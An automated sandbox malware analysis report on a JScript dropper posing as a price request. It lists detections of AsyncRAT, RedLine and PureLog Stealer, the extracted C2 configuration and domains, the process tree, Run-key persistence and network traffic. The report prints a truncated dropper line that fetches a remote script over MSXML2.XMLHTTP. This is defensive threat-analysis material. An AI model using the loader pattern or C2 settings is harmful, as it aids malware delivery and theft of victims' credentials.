
Windows Analysis Report
Price request N#U00b0DEM23000199.js

Overview

General Information

Sample name:Price request N#U00b0DEM23000199.js
renamed because original name is a hash value
Original sample name:Price request NDEM23000199.js
Analysis ID:1430766
MD5:58cd571807ec7624c3f5865fade24891
SHA1:ac42e6e8be1c0521aebecebc6b1eb75c75e761fa
SHA256:3eaae1b3f71898ceac37bd6a7779ed9e821d06a1004ff5f527922ae6c9066082
Tags:js

Detection

AsyncRAT, PureLog Stealer, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AsyncRAT
Yara detected PureLog Stealer
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Machine Learning detection for dropped file
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7492 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 7668 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • NaE.exe (PID: 7716 cmdline: "C:\Users\user\AppData\Local\Temp\NaE.exe" MD5: E05EDADFDDE523064F35BA05A09B55D5)
        • cmd.exe (PID: 7792 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpAB92.tmp.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 7844 cmdline: timeout 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • audio.exe (PID: 7888 cmdline: "C:\Users\user\AppData\Local\Temp\audio.exe" MD5: E05EDADFDDE523064F35BA05A09B55D5)
  • audio.exe (PID: 8088 cmdline: "C:\Users\user\AppData\Local\Temp\audio.exe" MD5: E05EDADFDDE523064F35BA05A09B55D5)
  • audio.exe (PID: 568 cmdline: "C:\Users\user\AppData\Local\Temp\audio.exe" MD5: E05EDADFDDE523064F35BA05A09B55D5)
  • cleanup
Malware family descriptions (Name, Description, Attribution, Link):

Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it can also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale, apparently as a standalone product ($100/$150 depending on the version) or on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, including details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and the malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
Extracted malware configuration (AsyncRAT): {"Server": "chongmei33.publicvm.com,chonglee575.duckdns.org", "Port": "2703,49746,6974", "Version": "0.5.7B", "MutexName": "AsyncMutex_6SI8OkPnk", "Autorun": "true", "Group": "null"}
Yara matches on dropped files (Source, Rule, Description, Author, Strings):

Source: C:\Users\user\AppData\Local\Temp\NaE.exe
Rule: JoeSecurity_RedLine
Description: Yara detected RedLine Stealer
Author: Joe Security

Source: C:\Users\user\AppData\Local\Temp\NaE.exe
Rule: MALWARE_Win_RedLine
Description: Detects RedLine infostealer
Author: ditekSHen
Strings:
    • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x700:$s3: 83 EC 38 53 B0 75 88 44 24 2B 88 44 24 2F B0 DB 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1e9d0:$s5: delete[]
    • 0x1de88:$s6: constructor or from DllMain.
Source: C:\Users\user\AppData\Local\Temp\audio.exe
Rule: JoeSecurity_RedLine
Description: Yara detected RedLine Stealer
Author: Joe Security

Source: C:\Users\user\AppData\Local\Temp\audio.exe
Rule: MALWARE_Win_RedLine
Description: Detects RedLine infostealer
Author: ditekSHen
Yara matches in process memory (Source, Rule, Description, Author, Strings):

Source: 00000004.00000002.1459366756.0000000000793000.00000004.00000020.00020000.00000000.sdmp
Rule: MALWARE_Win_AsyncRAT
Description: Detects AsyncRAT
Author: ditekSHen
Strings:
  • 0x798b:$x1: AsyncRAT
  • 0x79c9:$x1: AsyncRAT

Source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp
Rule: JoeSecurity_AsyncRAT
Description: Yara detected AsyncRAT
Author: Joe Security

Source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp
Rule: JoeSecurity_GenericDownloader_1
Description: Yara detected Generic Downloader
Author: Joe Security

Source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp
Rule: JoeSecurity_PureLogStealer
Description: Yara detected PureLog Stealer
Author: Joe Security

Source: 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp
Rule: JoeSecurity_AsyncRAT
Description: Yara detected AsyncRAT
Author: Joe Security

(4 of 71 memory matches shown)
Yara matches on unpacked PE images (Source, Rule, Description, Author, Strings):

Source: 10.3.audio.exe.73ed50.0.unpack
Rule: JoeSecurity_AsyncRAT
Description: Yara detected AsyncRAT
Author: Joe Security

Source: 10.3.audio.exe.73ed50.0.unpack
Rule: JoeSecurity_PureLogStealer
Description: Yara detected PureLog Stealer
Author: Joe Security

Source: 10.2.audio.exe.3505f90.7.unpack
Rule: JoeSecurity_AsyncRAT
Description: Yara detected AsyncRAT
Author: Joe Security

Source: 10.2.audio.exe.3505f90.7.unpack
Rule: JoeSecurity_PureLogStealer
Description: Yara detected PureLog Stealer
Author: Joe Security

Source: 4.2.NaE.exe.35083c0.6.raw.unpack
Rule: JoeSecurity_RedLine
Description: Yara detected RedLine Stealer
Author: Joe Security

(5 of 194 unpacked PE matches shown)

                        System Summary

Sigma rule matches (Source, Author, Data):

Source: Registry Key set
Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing
Data: Details: "C:\Users\user\AppData\Local\Temp\audio.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\NaE.exe, ProcessId: 7716, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audio

Source: Network Connection
Author: frack113, Florian Roth
Data: DestinationIp: 51.254.27.105, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7492, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49705

Source: Process started
Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7492, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js" , ProcessId: 7668, ProcessName: wscript.exe

Source: Process started
Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton
Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7492, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js" , ProcessId: 7668, ProcessName: wscript.exe

Source: Process started
Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community
Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js", ProcessId: 7492, ProcessName: wscript.exe

Source: File created
Author: Tim Shelton
Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 7492, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\wp[1].js

Source: Registry Key set
Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
Data: Details: "C:\Users\user\AppData\Local\Temp\audio.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\NaE.exe, ProcessId: 7716, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audio

Source: Network Connection
Author: frack113
Data: DestinationIp: 51.254.27.105, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7492, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49705

Source: Process started
Author: Michael Haag
Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js", ProcessId: 7492, ProcessName: wscript.exe

Snort IDS alert:
                        Timestamp:04/24/24-07:00:34.140261
                        SID:2018856
                        Source Port:443
                        Destination Port:49705
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        AV Detection

Source: chonglee575.duckdns.org; Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\IDWYPJ.js; Avira: detection malicious, Label: JS/Dldr.G8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\wp[1].js; Avira: detection malicious, Label: JS/Dldr.G8
Source: C:\Users\user\AppData\Local\Temp\audio.exe; Avira: detection malicious, Label: TR/Dropper.Gen
Source: 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: AsyncRAT {"Server": "chongmei33.publicvm.com,chonglee575.duckdns.org", "Port": "2703,49746,6974", "Version": "0.5.7B", "MutexName": "AsyncMutex_6SI8OkPnk", "Autorun": "true", "Group": "null"}
Source: chonglee575.duckdns.org; Virustotal: Detection: 10%
Source: https://postutopia.net/wp-includes/images/smilies/wp.js; Virustotal: Detection: 5%
Source: C:\Users\user\AppData\Local\Temp\NaE.exe; ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Virustotal: Detection: 61%
Source: C:\Users\user\AppData\Local\Temp\audio.exe; ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\audio.exe; Virustotal: Detection: 61%
Source: Price request N#U00b0DEM23000199.js; Virustotal: Detection: 32%
Source: Price request N#U00b0DEM23000199.js; ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\audio.exe; Joe Sandbox ML: detected
Source: unknown; HTTPS traffic detected: 51.254.27.105:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: Binary string: _.pdb; source: NaE.exe, 00000004.00000003.1401870654.0000000000782000.00000004.00000020.00020000.00000000.sdmp, NaE.exe, 00000004.00000002.1461555095.0000000003465000.00000004.00000800.00020000.00000000.sdmp, NaE.exe, 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, NaE.exe, 00000004.00000002.1459773527.00000000020E1000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, audio.exe, 00000008.00000002.2647263309.00000000036F5000.00000004.00000800.00020000.00000000.sdmp, audio.exe, 00000008.00000002.2646294834.0000000002121000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 00000008.00000003.1485055464.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 0000000A.00000003.1556222690.000000000073E000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, audio.exe, 0000000A.00000002.1605576072.00000000021A1000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 0000000A.00000002.1606447047.00000000034E5000.00000004.00000800.00020000.00000000.sdmp, audio.exe, 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, audio.exe, 0000000C.00000003.1633955977.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, audio.exe, 0000000C.00000002.1703974284.00000000035E5000.00000004.00000800.00020000.00000000.sdmp, audio.exe, 0000000C.00000002.1703024609.00000000020C1000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\Documents\desktop.ini

                        Software Vulnerabilities

Source: Price request N#U00b0DEM23000199.js; Argument value: ['"try{\nvar Object = new ActiveXObject("MSXML2.XMLHTTP");\nObject.Open("GET", "https://postutopia.net/w']

                        Networking

Source: Traffic; Snort IDS: 2018856 ET TROJAN Windows executable base64 encoded 51.254.27.105:443 -> 192.168.2.8:49705
Source: C:\Windows\System32\wscript.exe; Network Connect: 51.254.27.105 443
Source: Malware configuration extractor; URLs: chongmei33.publicvm.com
Source: Malware configuration extractor; URLs: chonglee575.duckdns.org
Source: global traffic; TCP traffic: 178.73.192.3 ports 49746,0,2,3,7,2703
Source: global traffic; TCP traffic: 141.101.134.51 ports 49746,4,6,7,9,6974
Source: Price request N#U00b0DEM23000199.js; Argument value: ['"try{\nvar Object = new ActiveXObject("MSXML2.XMLHTTP");\nObject.Open("GET", "https://postutopia.net/w']
Source: unknown; DNS query: name: chonglee575.duckdns.org
Source: global traffic; TCP traffic: 192.168.2.8:49708 -> 178.73.192.3:2703
Source: global traffic; TCP traffic: 192.168.2.8:49712 -> 141.101.134.51:6974
Source: Joe Sandbox View; IP Address: 141.101.134.51 141.101.134.51
Source: Joe Sandbox View; ASN Name: OVHFR OVHFR
Source: Joe Sandbox View; ASN Name: NETZBETRIEB-GMBHDE NETZBETRIEB-GMBHDE
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic; HTTP traffic detected:
  GET /wp-includes/images/smilies/wp.js HTTP/1.1
  Accept: */*
  Accept-Language: en-ch
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: postutopia.net
  Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; DNS traffic detected: queries for: postutopia.net
Source: NaE.exe, 00000004.00000002.1460450489.0000000002653000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wscript.exe, 00000000.00000003.1398114001.0000015E7F9CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1401872911.0000015E7F9CD000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com
Source: wscript.exe, 00000000.00000003.1398114001.0000015E7F9CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1401872911.0000015E7F9CD000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://postutopia.net/
Source: wscript.exe, 00000000.00000003.1398114001.0000015E7F9CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1401872911.0000015E7F9CD000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://postutopia.net/c
Source: wscript.exe, 00000000.00000003.1398377017.0000015E7F66D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397204688.0000015E7ECBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397394352.0000015E7F5D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1398461802.0000015E7F5F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396927667.0000015E7ECB4000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://postutopia.net/wp-includes/images/smilies/wp.js
Source: wscript.exe, 00000000.00000003.1396927667.0000015E7ECFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1400779172.0000015E7ED14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397064885.0000015E7ED0F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://postutopia.net/wp-includes/images/smilies/wp.js&v;=
Source: wscript.exe, 00000000.00000003.1396927667.0000015E7ECFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1400779172.0000015E7ED14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397064885.0000015E7ED0F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://postutopia.net/wp-includes/images/smilies/wp.js7
Source: wscript.exe, 00000000.00000003.1396927667.0000015E7ECFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1400779172.0000015E7ED14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397064885.0000015E7ED0F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://postutopia.net/wp-includes/images/smilies/wp.jsG
Source: wscript.exe, 00000000.00000003.1396927667.0000015E7ECFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1400779172.0000015E7ED14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397064885.0000015E7ED0F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://postutopia.net/wp-includes/images/smilies/wp.jsW
Source: unknown; Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown; HTTPS traffic detected: 51.254.27.105:443 -> 192.168.2.8:49705 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: Yara match | File source: 10.3.audio.exe.73ed50.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 10.2.audio.exe.3505f90.7.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.NaE.exe.3485f90.5.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 8.2.audio.exe.26a0000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.NaE.exe.3485f90.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 10.2.audio.exe.2310000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.audio.exe.21023f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 10.2.audio.exe.34e6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 10.2.audio.exe.21e23f6.2.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.audio.exe.4a60000.6.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 8.2.audio.exe.26a0000.5.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 10.3.audio.exe.73ed50.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.NaE.exe.21214ee.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 10.2.audio.exe.34e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.NaE.exe.21223f6.2.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 8.2.audio.exe.2620f08.4.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 10.2.audio.exe.50b0000.8.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.NaE.exe.3466478.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.NaE.exe.22d0000.4.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.audio.exe.35e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 8.2.audio.exe.3715f90.7.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.audio.exe.21023f6.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 8.2.audio.exe.36f6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 8.2.audio.exe.36f5570.8.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.NaE.exe.22d0f08.3.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 10.2.audio.exe.34e6478.6.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 8.2.audio.exe.36f5570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.audio.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.NaE.exe.22d0000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 8.2.audio.exe.36f6478.6.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.NaE.exe.50c0000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.audio.exe.35e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.audio.exe.50c0000.8.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 10.2.audio.exe.2310f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 8.2.audio.exe.21623f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.3.NaE.exe.782700.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.NaE.exe.3465570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 8.2.audio.exe.2620f08.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.3.NaE.exe.782700.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.NaE.exe.21223f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 8.2.audio.exe.3715f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 8.3.audio.exe.6dfc80.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 10.2.audio.exe.34e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.audio.exe.4a60f08.7.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.audio.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 10.2.audio.exe.21e14ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.audio.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.audio.exe.3605f90.4.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 8.2.audio.exe.21623f6.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 8.2.audio.exe.21614ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.NaE.exe.3465570.8.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 10.2.audio.exe.3505f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 10.2.audio.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.audio.exe.3605f90.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 10.2.audio.exe.21e23f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.NaE.exe.22d0f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.audio.exe.21014ee.2.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 8.2.audio.exe.21614ee.2.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 10.2.audio.exe.21e14ee.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.NaE.exe.21214ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.audio.exe.35e6478.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 10.2.audio.exe.2310f08.3.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.audio.exe.35e6478.3.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.NaE.exe.3466478.7.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 8.2.audio.exe.2620000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 8.2.audio.exe.2620000.3.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 8.3.audio.exe.6dfc80.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 12.2.audio.exe.21014ee.2.raw.unpack, type: UNPACKEDPE
